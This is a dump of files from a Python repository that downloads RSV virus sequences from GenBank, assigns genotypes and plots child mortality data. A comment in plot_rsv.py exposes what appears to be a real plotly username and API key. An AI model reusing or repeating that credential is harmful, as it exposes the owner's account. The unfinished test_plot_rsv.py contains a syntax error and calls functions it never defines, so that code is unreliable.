self.assertTrue(3 <= len(line.split(' ')) <= 4)\n self.assertTrue(line.split(' ')[1] in ['A', 'B',\n 'NaN'])\n # Test all aligned seqs have same length\n if lenprevseq != 0:\n self.assertEqual(len(align_seq), lenprevseq)\n if align_seq:\n lenprevseq = len(align_seq)\n align_seq = ''\n else:\n align_seq += line\n\n\n def test_getrefseqs(self):\n \"\"\"Test getting reference sequences yields expected output.\n\n Test on actual alignments from data rather than toy data.\n \"\"\"\n\n # Only run tests on output if such files exist.\n for alignment in ALIGNMENTS:\n self.assertTrue(os.path.isfile(alignment))\n\n gt_list = GT_A_LIST + GT_B_LIST\n\n test_refs = genotype.getrefseqs(ALIGNMENTS[0], ALIGNMENTS[2])\n\n for key in test_refs:\n self.assertTrue(key in gt_list)\n # Empty strings are false. Ensure genotypes have seq.\n self.assertTrue(test_refs[key])\n\n\n\n def test_assign_gt(self):\n \"\"\"Test assigning gneotypes with actual data.\n\n I have not created toy `.fasta` files for testing, so test on real\n data.\n There is a rough check for mistyping in the main code, so just make\n sure output is as expected. Overall, we only check if our genotypes\n are logical and make no claim that they are fully accurate.\n\n Check that if threshold is changed, number of new genotypes and \n mistyped genotypes changes as expected.\n\n This test is slow and takes ~25 seconds to run.\n \"\"\"\n\n self.assertTrue(os.path.isfile(ALIGNMENTS[2]))\n\n alignall = ALIGNMENTS[2]\n\n # Assumes test_getrefseqs passes\n test_refgts = genotype.getrefseqs(ALIGNMENTS[0], ALIGNMENTS[2])\n\n threshold_norm = 150\n threshold_lax = 50\n threshold_strict = 200\n\n assigngt_norm = genotype.assign_gt(alignall, test_refgts,\n threshold_norm)\n self.assertTrue(len(assigngt_norm[2]) == assigngt_norm[1])\n\n assigngt_lax = genotype.assign_gt(alignall, test_refgts,\n threshold_lax)\n self.assertTrue(len(assigngt_lax[2]) == assigngt_lax[1])\n\n assigngt_strict = genotype.assign_gt(alignall, test_refgts,\n threshold_strict)\n self.assertTrue(len(assigngt_strict[2]) == assigngt_strict[1])\n\n self.assertTrue(assigngt_strict[1] < assigngt_norm[1] \\\n < assigngt_lax[1])\n\n self.assertTrue(len(assigngt_strict[0]) < len(assigngt_norm[0]) \\\n < len(assigngt_lax[0]))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.5564664006233215,
"alphanum_fraction": 0.5622910261154175,
"avg_line_length": 31.875886917114258,
"blob_id": "257feb19d1e5de50f8bd1489652181a080675eee",
"content_id": "20d9cd2422935aeb0f66738f04ef90ae7fa55762",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9271,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 282,
"path": "/rsview/seq_download.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Download sequences and metadata from GenBank\"\"\"\n\nimport time\nimport re\nimport os\nimport math\nimport pandas as pd\nfrom Bio import Entrez\nimport rsview.parsearguments\n\n\n# Initialize lists for genotype assignment\nGTA_LIST = [r'\\bGA\\s?[0-9]*\\b', r'\\bNA\\s?[0-9]*\\b', r'\\bSAA\\s?[0-9]*\\b',\n\t\t r'\\bON\\s?[0-9]*\\b']\n\nGTB_LIST = [r'\\bGB\\s?[0-9]*\\b', r'\\bSAB\\s?[0-9]*\\b', r'\\bURU\\s?[0-9]*\\b',\n\t\t r'\\bBA\\s?[0-9]*\\b', r'\\bBA\\s?IV\\b', r'\\bTHB\\b']\n\n\ndef getids(database, retmax, term):\n \"\"\"Retrieve genbank sequence IDs matching query term.\n\n Args:\n `database` (str)\n string specifying genbank database to search\n `retmax` (int)\n maximum number of sequence IDs to return\n `term` (str)\n query term\n\n Returns:\n `search_IDs` (list)\n list of sequence IDs returned from the search\n \"\"\"\n search_handle = Entrez.esearch(db=database, retmax=retmax, term=term)\n search_record = Entrez.read(search_handle)\n search_handle.close()\n search_ids = search_record['IdList']\n return search_ids\n\ndef gethandle(database, ids, firstseq, dload_size, rettype, retmode):\n \"\"\"Download Entrez 'handle' for downloading seqs of interest\n \n See `Entrez.efetch` help for additional help.\n\n Args:\n `database` (str)\n Genbank database containing sequences of interest\n `ids` (list)\n sequence IDs returned from `getIDs` or other Entrez search\n `firstseq` (int)\n index of first sequence to download\n `dload_size` (int)\n \tnumber of seqs to download at a time\n `rettype` (str)\n \ttype of file downloaded from GenBank. default: 'gb'\n `retmode` (str)\n \tformat of output from GenBank download. default: `xml`\n\n Returns:\n `handle`\n Entrez object containing sequence information\n \"\"\"\n\n handle = Entrez.efetch(db=database, id=ids, retstart=firstseq,\n \t\tretmax=dload_size, rettype=rettype, retmode=retmode)\n return handle\n\ndef find_subtype(meta_dict):\n \"\"\"Find subtype from dictionary of sequence metadata.\n\n Args:\n `meta_dict` (dict)\n \tdictionary of metadata downloaded from genbank\n\n Returns:\n `subtype` (str)\n \tRSV subtype as one letter string, 'A' or 'B'.\n \"\"\"\n\n subtype = ''\n if ' A' in meta_dict['organism']:\n subtype = 'A'\n elif ' B' in meta_dict['organism']:\n subtype = 'B'\n\n elif subtype == '':\n for val in meta_dict.values():\n if re.search(r'RSV\\s?A\\b', val) or \\\n re.search(r'type: A\\b', val) or \\\n re.search(r'group: A\\b', val) or re.search(r'\\bA\\b', val):\n subtype = 'A'\n elif re.search(r'RSV\\s?B\\b', val) or \\\n re.search(r'type: B\\b', val) or \\\n re.search(r'group: B\\b', val) or re.search(r'\\bB\\b', val):\n subtype = 'B'\n\n return subtype\n\n\ndef find_genotype(meta_dict, genotypes_a, genotypes_b):\n \"\"\"Script for extracting genotype data from genbank metadata.\n\n If the genotype is found, but the subtype is still empty, populate\n subtype data based on genotype.\n\n\n Args:\n `meta_dict` (dict)\n dictionary of metadata\n `genotypes_a` (list)\n list of possible genotypes for subtype A\n `genotypes_b` (list)\n list of possible genotypes for subtype B\n\n Returns:\n `typed_dict` (dict)\n dictionary of metadata with genotype (and missing subtype) data\n filled in.\n \"\"\"\n typed_dict = meta_dict\n genotype = ''\n for value in meta_dict.values():\n if 'genotype:' in value:\n for gtype in genotypes_a:\n if re.search(gtype, value):\n genotype = re.findall(gtype, value)[0]\n if meta_dict['subtype'] == '':\n typed_dict['subtype'] = 'A'\n\n for gtype in genotypes_b:\n if re.search(gtype, value):\n genotype = re.findall(gtype, value)[0]\n if meta_dict['subtype'] == '':\n typed_dict['subtype'] = 'B'\n\n typed_dict['genotype'] = genotype\n\n return typed_dict\n\n\ndef makedf(handle):\n \"\"\"\n Convert Genbank sequence data into dataframe containing necessary\n metadata.\n\n Args:\n `handle`\n Entrez object containing information downloaded from GenBank\n\n Returns:\n `seqinfo_df` (DataFrame)\n pandas DataFrame containing downloaded sequence and metadata\n \"\"\"\n records = Entrez.parse(handle)\n seqinfo = []\n for record in records:\n sub_dict = {}\n features = record['GBSeq_feature-table']\n\n #Retrieve metadata\n strain_quals = features[0]['GBFeature_quals']\n for qual in strain_quals:\n qual_dict = dict(qual)\n if 'GBQualifier_value' in qual_dict.keys():\n sub_dict[qual_dict['GBQualifier_name']] = \\\n qual_dict['GBQualifier_value']\n\n #Retrieve G protein sequence\n for feat_dict in features[1:]:\n if 'GBFeature_quals' in feat_dict.keys():\n for feat_qual in feat_dict['GBFeature_quals']:\n if 'GBQualifier_value' in feat_qual.keys():\n if re.search(r'\\bG\\b', feat_qual['GBQualifier_value'])\\\n or re.search(r'\\battachment.*protein\\b',\n feat_qual['GBQualifier_value']):\n g_quals = feat_dict['GBFeature_quals']\n for g_qual in g_quals:\n if g_qual['GBQualifier_name'] == 'translation':\n sub_dict['G_seq'] = g_qual['GBQualifier_value']\n\n sub_dict['subtype'] = find_subtype(sub_dict)\n\n sub_dict = find_genotype(sub_dict, GTA_LIST, GTB_LIST)\n\n seqinfo.append(sub_dict)\n\n handle.close()\n\n seqinfo_df = pd.DataFrame(seqinfo)\n\n return seqinfo_df\n\n\ndef main():\n \"\"\"Download sequence data and return dataframe\"\"\"\n\n parser = rsview.parsearguments.seq_parser()\n args = vars(parser.parse_args())\n prog = parser.prog\n\n print(\"\\nExecuting {0} ({1}) in {2} at {3}.\\n\".format(\n prog, rsview.__version__, os.getcwd(), time.asctime()))\n\n Entrez.email = args['email']\n query = args['query']\n begin = args['firstseq']\n filesize = args['filesize']\n maxseqs = args['maxseqs']\n database = args['db']\n filetype = args['filetype']\n outmode = args['outmode']\n\n if 0 < (filesize - begin) < 100:\n batchsize = filesize - begin\n else:\n batchsize = args['batchsize']\n\n assert maxseqs >= begin, \"Search ends before index of `--firstseq`. \"\\\n \"`--maxseqs` ({0}) must be greater than `--firstseq` ({1}).\"\\\n .format(maxseqs, begin)\n\n if not os.path.isdir(args['outdir']):\n os.makedirs(args['outdir'])\n\n maxids = getids(database, maxseqs, query)\n num_all = len(maxids)\n if num_all < maxseqs:\n print('There are {0} IDs that match the query:\\n\\t{1}'.format(\n \t\tnum_all, query))\n elif num_all == maxseqs:\n print('There are at least {0} IDs that match the query:\\n\\t{1}\\n'\\\n '`--maxseqs` may be limiting number of IDs returned.'.format(\n num_all, query))\n\n firstseq = begin # keept track of first seq for print statements\n\n while begin < maxseqs:\n if (begin + filesize) <= maxseqs:\n end = begin + filesize\n else:\n end = maxseqs\n outfile = '{0}/{1}_{2}-{3}.csv'.format(args['outdir'],\n \t\targs['outprefix'], begin, end)\n print('\\nDownloading seq file number {0} of {1}.'.format(\n int(math.ceil((end-firstseq)/filesize)), \n int(math.ceil((num_all-firstseq)/filesize))))\n print('Saving sequences and metadata to: {0}'.format(outfile))\n\n ids = getids(database, end, query)\n numseqs = len(ids)\n\n start = begin\n print('Downloading metadata for seqs: {0} to {1}'.format(start, numseqs))\n\n metadata_frames = []\n while start <= (numseqs - batchsize):\n handle = gethandle(database, ids, start, batchsize, filetype, outmode)\n metadata_df = makedf(handle)\n metadata_frames.append(metadata_df)\n start = start + batchsize\n if (start-begin) % 500 == 0:\n print('Processed {0} seqs'.format(start-begin))\n\n if start != numseqs: #Process final seqs\n handle = gethandle(database, ids, start, numseqs, filetype, outmode)\n metadata_df = makedf(handle)\n metadata_frames.append(metadata_df)\n\n full_df = pd.concat(metadata_frames, ignore_index=True, sort=False)\n assert len(full_df.index) == (numseqs-begin), 'Exported unexpected ' \\\n 'number of seqs. Expected: {0} Retrieved: {1}'.format(\n (numseqs-begin), len(full_df.index))\n full_df.to_csv(outfile)\n\n begin = end\n\nif __name__ == '__main__':\n START_TIME = time.time()\n main()\n END_TIME = time.time()\n print('Program took {0:.3f} minutes to run.'.format((END_TIME - START_TIME)/60))\n"
},
{
"alpha_fraction": 0.42718446254730225,
"alphanum_fraction": 0.42718446254730225,
"avg_line_length": 24.75,
"blob_id": "3c1e019333cbb64feaa9b723ed8868200375ea79",
"content_id": "a2ce6ab3061968b02c3b157163eded60878edab3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 8,
"path": "/rsview/__init__.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"\n===================================\nPython API for ``rsview``\n===================================\n\"\"\"\nfrom ._metadata import __version__\nfrom ._metadata import __url__\nfrom ._metadata import __author__\n"
},
{
"alpha_fraction": 0.5977988839149475,
"alphanum_fraction": 0.604302167892456,
"avg_line_length": 35.345455169677734,
"blob_id": "e73fdddfa97675599d485af6c8761f04ae5abc26",
"content_id": "0dbb17f69a67b5d76e8cfe6e56bd2993375ed74e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1999,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 55,
"path": "/setup.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Setup script for ``rsview``.\"\"\"\n\nimport sys\nfrom os import path\ntry:\n from setuptools import setup, find_packages, Extension\nexcept ImportError:\n from distutils.core import setup, find_packages, Extension\n\n# Check that using Python 3\nif not (sys.version_info[0] == 3):\n raise RuntimeError('rsview requires Python 3.x\\n'\n 'You are using Python {0}.{1}'.format(\n sys.version_info[0], sys.version_info[1]))\n\n# get metadata, which is specified in another file\nmetadata = {}\nwith open('./rsview/_metadata.py') as f:\n lines = [line for line in f.readlines() if not line.isspace()]\nfor dataname in ['version', 'author', 'url']:\n for line in lines:\n entries = line.split('=')\n assert len(entries) == 2, \"Failed to parse metadata:\\n%s\" % line\n if entries[0].strip() == '__%s__' % dataname:\n if dataname in metadata:\n raise ValueError(\"Duplicate metadata for %s\" % dataname)\n else:\n metadata[dataname] = entries[1].strip()[1 : -1]\n assert dataname in metadata, \"Failed to find metadata for %s\" % dataname\n\nwith open('README.md') as f:\n readme = f.read()\n\n# main setup command\nsetup(\n name = 'rsview',\n version = metadata['version'],\n author = metadata['author'],\n url = metadata['url'],\n description = 'Mapping of RSV sequences based on Genbank submissions.' \\\n 'Correlation of genotypes with childhood pneumonia deaths.',\n long_description = readme,\n license = 'MIT License',\n install_requires = ['biopython', 'country_converter', 'plotly', 'pandas'],\n packages=find_packages(exclude=['docs', 'tests']),\n package_dir = {'RSView':'rsview'},\n scripts = ['rsview/seq_download.py',\n 'rsview/genotype.py',\n 'rsview/map_rsv.py',\n 'rsview/health_download.py',\n 'rsview/parsearguments.py',\n 'rsview/plot_rsv.py',\n 'rsview/plot_correlation.py'\n ]\n)\n"
},
{
"alpha_fraction": 0.5667232871055603,
"alphanum_fraction": 0.5692699551582336,
"avg_line_length": 38.797298431396484,
"blob_id": "c21fb825b773a540c180571a661b7428d1ea57b2",
"content_id": "ed40cc4f7c73dc0c14dd19c659db4e4863070bb5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5890,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 148,
"path": "/rsview/tests/test_plot_rsv.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUnittests for map_rsv.py\n\"\"\"\nimport os\nimport unittest\nfrom unittest.mock import patch\n\nimport rsview.plot_rsv as plot_rsv\n\nclass TestPlotRsv(unittest.TestCase):\n \"\"\"\n Tests map_rsv.py\n \"\"\" \n def run_make_df_health_summary(self, datadir):\n \"\"\"\n Run plot_rsv.make_df_health_summary function for testing\n \"\"\"\n rsv_df = plot_rsv.make_df_health_summary(datadir)\n return rsv_df\n\n def run_make_df_health_all(self, datadir):\n \"\"\"\n Run plot_rsv.make_df_health_summary function for testing\n \"\"\"\n rsv_df = plot_rsv.make_df_health_all(datadir)\n return rsv_df\n\n def run input_to_country(self, country_input):\n \"\"\"\n Run plot_rsv.input_to_country function for testing\n \"\"\"\n country = plot_rsv.input_to_country(country_input)\n return country\n\n def run_plot_summary(self, data_type, datadir, highlight_country=None):\n \"\"\"\n Run plot_rsv.plot_summary function for testing\n \"\"\"\n fig = plot_rsv.plot_summary(data_type, datadir, highlight_country)\n return fig\n\n def run_plot_country(self, data_type, datadir, country='Global'):\n \"\"\"\n Run plot_rsv.run_plot_country function for testing\n \"\"\"\n fig = plot_rsv.run_plot_country(data_type, datadir, country)\n return fig\n\n\n\n\n\n\n######## still editing past this point #########\n\n def test_organize_data(self):\n \"\"\"\n Test map_rsv.organize_data function\n \"\"\"\n rsv_df = self.run_organize_data('data')\n\n self.assertEqual(list(rsv_df.columns), ['collection_date', 'country', 'subtype',\n 'genotype', 'year', 'genotype_group'])\n self.assertTrue(len(rsv_df[col].notnull()) == len(rsv_df) for col in rsv_df.columns)\n\n def test_count_types(self):\n \"\"\"\n Test map_rsv.count_types function with different arguments\n \"\"\"\n #Test that health data file exists\n self.assertTrue(os.path.isfile('data'+map_rsv.HEALTHFILE))\n #Test that latitude/longitude data file exists\n self.assertTrue(os.path.isfile('data'+'/country_centroids.csv'))\n\n #Test level='subtype'\n organized_df = self.run_count_types('subtype', 'data')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'year', 'count', 'country_code', 'Longitude',\n 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) == len(organized_df) for\n col in organized_df.columns)\n\n #Test level='genotype'\n organized_df = self.run_count_types('genotype', 'data')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'genotype_group', 'year', 'count', 'country_code',\n 'Longitude', 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) == len(organized_df) for\n col in organized_df.columns)\n\n #Test level='genotype', genotype_level='all'\n organized_df = self.run_count_types('genotype', 'data', genotype_level='all')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'genotype', 'year', 'count', 'country_code',\n 'Longitude', 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) ==\n len(organized_df) for col in organized_df.columns)\n\n #Don't actually produce plot, just test function components\n @patch(\"rsview.map_rsv.py.plot\")\n def test_map_rsv(self, mock_show):\n \"\"\"\n Test map_rsv.map_rsv function with different arguments\n \"\"\"\n #Test level='subtype'\n fig = self.run_map_rsv('subtype', 'data')\n\n self.assertEqual(len(fig['data']), len(self.run_count_types('subtype', 'data'))+2)\n self.assertEqual(len(fig['layout']['sliders'][0]['steps']), (int(2018-1980)+1))\n self.assertTrue('subtype' in fig['data'][0]['hovertext'])\n\n #Test level='subtype', years = 'all'\n fig = self.run_map_rsv('subtype', 'data', years='all')\n year_range = [yr for yr in range(int(self.run_count_types('subtype', 'data').year.min()),\n int(self.run_count_types('subtype', 'data').year.max()))]\n\n self.assertEqual(len(fig['layout']['sliders'][0]['steps']), len(year_range))\n\n #Test level='genotype'\n fig = self.run_map_rsv('genotype', 'data')\n organized_df = self.run_count_types('genotype', 'data')\n a_groups = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype_group'].tolist()))\n b_groups = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype_group'].tolist()))\n\n self.assertEqual(len(fig['data']), len(organized_df) +\n len(a_groups+b_groups))\n self.assertTrue('genotype_group' in fig['data'][0]['hovertext'])\n\n #Test level='genotype', genotype_level='all'\n fig = self.run_map_rsv('genotype', 'data', genotype_level='all')\n organized_df = self.run_count_types('genotype', 'data', genotype_level='all')\n a_genotypes = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype'].tolist()))\n b_genotypes = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype'].tolist()))\n\n self.assertEqual(len(fig['data']), len(organized_df) +\n len(a_genotypes+b_genotypes))\n self.assertTrue('genotype' in fig['data'][0]['hovertext'])\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.369047611951828,
"alphanum_fraction": 0.369047611951828,
"avg_line_length": 13,
"blob_id": "35312c881b6fc383c82c41a4fa0a8458a5f06d65",
"content_id": "30424adb06a80baa875890b90c41242ea021e083",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 84,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 6,
"path": "/docs/map_rsv.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "==============\n``map_rsv.py``\n==============\n\n.. automodule:: map_rsv\n :members:\n"
},
{
"alpha_fraction": 0.5715253949165344,
"alphanum_fraction": 0.5854237079620361,
"avg_line_length": 33.30232620239258,
"blob_id": "ba16087c5799c076557aa9eb87f7a6f78571819e",
"content_id": "2de6b7c7bf60f42868bc4e6c2a922e977c5a495f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2950,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 86,
"path": "/rsview/tests/test_seq_download.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Test rsview.seq_download.py\"\"\"\nimport unittest\nfrom Bio import Entrez\nimport rsview.seq_download as seq_download\n\n# constants for testing\nEMAIL = '[email protected]'\nDB = 'nuccore'\nRETMAX = 5\nTERM = 'human respiratory syncytial virus G'\n\n#GT_A and GT_B lists based on genotypes already known to be present.\nGT_A_LIST = ['ON1', 'GA1', 'GA2', 'GA3', 'GA5', 'GA6', 'GA7', 'NA1', 'NA2',\n 'NA3', 'SAA1', 'SAA2']\nGT_B_LIST = ['BA', 'BA2', 'BA4', 'BA5', 'BA7', 'BA8', 'BA9', 'BA10', 'BA11',\n 'BA12', 'BA14', 'THB', 'SAB1', 'SAB3', 'SAB4', 'GB1', 'GB2',\n 'GB3', 'GB4', 'GB13', 'GB12']\n\nTEST_DICTS = [{'organism': 'Human respiratory syncytial virus A'},\n {'organism': 'Human orthopneumovirus', 'strain': 'RSVB'},\n {'organism': 'Human paramyxovirus', 'note': 'subtype: A, '\\\n 'genotype: NA1'}, {'organism': 'Human orthopneumovirus'}]\n\nTEST_SUBTYPES = ['A', 'B', 'A', '']\nTEST_GENOTYPES = ['', '', 'NA1', '']\n\nCOLUMNS = ['G_seq', 'genotype', 'subtype', 'collection_date', 'country']\n\n\nclass TestSeqDownload(unittest.TestCase):\n \"\"\"\n Tests seq_download.py\n \"\"\"\n\n def test_getids(self):\n \"\"\"Make sure Entrez query returns expected number of seq IDs.\"\"\"\n Entrez.email = EMAIL\n self.assertTrue(len(seq_download.getids(DB, RETMAX, TERM)) == RETMAX)\n\n\n def test_find_subtype(self):\n \"\"\"Make sure get correct subtypes from toy data.\"\"\"\n for (i, test_subtype) in enumerate(TEST_SUBTYPES):\n self.assertTrue(seq_download.find_subtype(\n TEST_DICTS[i]) == test_subtype)\n\n\n def test_find_genotype(self):\n \"\"\"Makes sure genotype added to toy dicts.\n Assumes `test_find_subtype` passes.\n Make sure assigns correct genotypes basd on toy data.\n \"\"\"\n for (i, test_dict) in enumerate(TEST_DICTS):\n test_dict['subtype'] = TEST_SUBTYPES[i]\n genotyped_dict = seq_download.find_genotype(\n test_dict, GT_A_LIST, GT_B_LIST)\n self.assertTrue('genotype' in genotyped_dict.keys())\n self.assertTrue(genotyped_dict['genotype'] == TEST_GENOTYPES[i])\n \n\n def test_makedf(self):\n \"\"\"Test dataframe creation from small download.\n\n This does not test `seq_download.gethandle()` as that function is\n essentially just an implementation of `Entrez.efetch`, which is not\n maintained by this project.\n \"\"\"\n # This assumes test_getids passes\n ids = seq_download.getids(DB, RETMAX, TERM)\n firstseq = 0\n rettype = 'gb'\n retmode = 'xml'\n handle = seq_download.gethandle(DB, ids, firstseq, RETMAX,\n rettype, retmode)\n\n test_df = seq_download.makedf(handle)\n\n self.assertTrue(len(ids) == len(test_df))\n\n for column in COLUMNS:\n self.assertTrue(column in list(test_df))\n\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6241549253463745,
"alphanum_fraction": 0.6437054872512817,
"avg_line_length": 31.005847930908203,
"blob_id": "d32129dadd22aa35a2291e09f434e8bc56562f7c",
"content_id": "82b427c13e954a21d369d33574f2954f7022a69f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5473,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 171,
"path": "/rsview/plot_rsv.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\" Can generate plots of RSV health data on a summary or individual country level \"\"\"\n\nimport pandas as pd\nimport country_converter as coco\nimport plotly.graph_objs as go\nfrom plotly.offline import plot\n\nfrom parsearguments import plot_parser\n\n\n# import rsview.parsearguments\n\n# plotly.tools.set_credentials_file(username='jillianeb', api_key='eOsTljd6vVMiyuy4Msy0')\n# plotly.tools.set_config_file(world_readable=False,\n# sharing='private')\n\n\ndef dict_to_help(data_types):\n \"\"\" Turns DATA_DICT into readable format for help text \"\"\"\n output = \"\"\n for item in data_types:\n output = output + \" \" + item + \": \"\n output = output + data_types[item] + \"\\n\"\n return output\n\ndef make_df_health_summary(datadir):\n \"\"\"\n Returns summary dataframe from health data at specified location\n \"\"\"\n df_health_summary = pd.read_csv(str(datadir) + '/health_data_summary.csv')\n return df_health_summary\n\ndef make_df_health_all(datadir):\n \"\"\"\n Returns full dataframe from health data at specified location\n \"\"\"\n df_health_all = pd.read_csv(str(datadir) + '/health_data_all.csv')\n return df_health_all\n\nDATA_DICT = {\n 'nnd':'Total Neonatal Deaths',\n 'pnd':'Total Post-Neonatal Deaths',\n 'neo9':'Neonatal deaths due to Acute Respiratory Infection',\n 'post9':'Post-neonatal deaths due to Acute Respiratory Infection',\n 'ufive9':'Underfive deaths due to Acute Respiratory Infection',\n 'rneo9':'Neonatal death rate from Acute Respiratory Infection (per 1000 live births)',\n 'rpost9':'Post-neonatal death rate from Acute Respiratory Infection (per 1000 live births)',\n 'rufive9':'Underfive death rate from Acute Respiratory Infection (per 1000 live births)',\n 'fneo9':'Percent Neonatal deaths due to Acute Respiratory Infection',\n 'fpost9':'Percent Post-neonatal deaths due to Acute Respiratory Infection',\n 'fufive9':'Percent Underfive deaths due to Acute Respiratory Infection'}\n\ndef input_to_country(country_input):\n \"\"\" Takes user input for country and converts it to short country name \"\"\"\n if country_input in ('Global', 'global'):\n return 'Global'\n country = coco.convert(names=country_input, to='name_short')\n return country\n\n\ndef is_country_present(dataframe, country):\n \"\"\" Checks if user input country is a valid country in the dataset \"\"\"\n iso3 = coco.convert(names=country, to='ISO3')\n # process some error if coco can't convert to a country\n\n in_dataset = iso3 in dataframe['iso3']\n return in_dataset\n\n\ndef plot_summary(data_type, datadir, highlight_country=None):\n \"\"\" Plots summary health data. If a highlight_country is specified, it will be highlighted \"\"\"\n\n df_health_summary = make_df_health_summary(datadir)\n\n color_dict = ['rgba(204,204,204,1)'] * len(df_health_summary)\n color_highlight = color_dict.copy()\n\n\n\n df_sorted = df_health_summary.sort_values(data_type)\n df_sorted = df_sorted.reset_index(drop=True)\n\n if highlight_country is not None:\n country_short = input_to_country(highlight_country)\n highlight_index = df_sorted.index[df_sorted['country_short'] == country_short].values[0]\n #highlight_index = 186\n color_highlight[highlight_index] = 'rgba(222,45,38,0.8)'\n\n trace1 = go.Bar(\n x=df_sorted['country_short'],\n y=df_sorted[data_type],\n name='neo9',\n marker=dict(\n color=color_highlight\n ),\n )\n\n data = [trace1]\n layout = go.Layout(\n title=DATA_DICT[data_type] + '<br> Averaged from 2000-2016',\n yaxis=dict(\n #title='Percent',\n titlefont=dict(\n size=16,\n color='rgb(107, 107, 107)'\n ),\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n ),\n )\n\n fig = go.Figure(data=data, layout=layout)\n\n plot(fig)\n\n #return py.iplot(fig, filename='stacked-bar', world_readable=True)\n #return plot(fig, filename='stacked-bar', world_readable=True)\n\n\n\ndef plot_country(data_type, datadir, country='Global'):\n \"\"\" Plots health data for a specified country over time \"\"\"\n\n country_short = input_to_country(country)\n\n df_health_all = make_df_health_all(datadir)\n df_country1 = df_health_all[(df_health_all['country_short'] == country_short)]\n\n color_dict = ['rgba(204,204,204,1)'] * len(df_health_all)\n\n trace1 = go.Bar(\n x=df_country1['year'],\n y=df_country1[data_type],\n name=DATA_DICT[data_type] + ' in ' + country,\n marker=dict(\n color=color_dict\n ),\n )\n\n data = [trace1]\n layout = go.Layout(\n title=DATA_DICT[data_type] + ' in ' + country,\n yaxis=dict(\n #title='Averaged from 2000-2016',\n ),\n )\n\n\n fig = go.Figure(data=data, layout=layout)\n\n plot(fig)\n\n #return py.iplot(fig, filename='stacked-bar', world_readable=True)\n\n\ndef main(level, data_type, datadir, country='Global', highlight_country=None):\n \"\"\" Processes user inputs to generate the specified graphs \"\"\"\n\n if level != 'country':\n return plot_summary(data_type, datadir, highlight_country)\n return plot_country(data_type, datadir, country)\n\nif __name__ == \"__main__\":\n\n ARGS = plot_parser(dict_to_help(DATA_DICT)).parse_args()\n\n main(\n ARGS.level, ARGS.data_type, ARGS.datadir, country=ARGS.country,\n highlight_country=ARGS.highlight_country)\n"
},
{
"alpha_fraction": 0.39772728085517883,
"alphanum_fraction": 0.39772728085517883,
"avg_line_length": 13.666666984558105,
"blob_id": "c1e4766697e61d11f8128e4b993dec5981c05327",
"content_id": "20f0dfd3e7369c655dc5768d71196bf90bcfcb9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 88,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 6,
"path": "/docs/genotype.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "===============\n``genotype.py``\n===============\n\n.. automodule:: genotype\n :members:\n"
},
{
"alpha_fraction": 0.5590388178825378,
"alphanum_fraction": 0.5659916996955872,
"avg_line_length": 31.53174591064453,
"blob_id": "d410b8d162eccad95551157acdefd57b14c9ac2a",
"content_id": "42920e65d33a193f3c8a3da826706538e294198e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8198,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 252,
"path": "/rsview/plot_correlation.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
